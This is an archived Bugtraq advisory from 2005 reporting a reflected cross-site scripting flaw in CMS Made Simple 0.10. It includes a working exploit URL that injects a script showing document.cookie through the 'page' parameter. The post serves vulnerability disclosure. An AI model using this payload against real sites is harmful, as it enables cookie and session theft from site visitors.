[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CMS Made Simple 0.10 is susceptible to a cross site scripting attack.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CMS Made Simple 0.10 is susceptible to a cross site scripting attack.
From: X1ngBox@xxxxxxxxxxxxxxxxx, Gmail@xxxxxxxxxxxxxxxxx, COM@xxxxxxxxxxxxxxxxx
Date: 26 Sep 2005 08:38:05 -0000

[Description]: CMS lets you update your pages and keep the content on a static 
page that will
                not become stale regardless of how much other content gets 
placed on your site


[version]:CMS Made Simple 0.10

[vendor]:http://www.cmsmadesimple.org

[Vulnerability]: cross site script

[exploit]:
http://[host]/[cms]/index.php?page=<script>alert(document.cookie);</script>
 
.......[X1NG]..........
X1ngBox <at/> Gmail Com

Prev by Date: FreeBSD GNU Mailutils 0.6 imap4d exploit
Next by Date: RealPlayer && HelixPlayer Remote Format String Exploit
Previous by thread: FreeBSD GNU Mailutils 0.6 imap4d exploit
Next by thread: RealPlayer && HelixPlayer Remote Format String Exploit
Index(es):
- Date
- Thread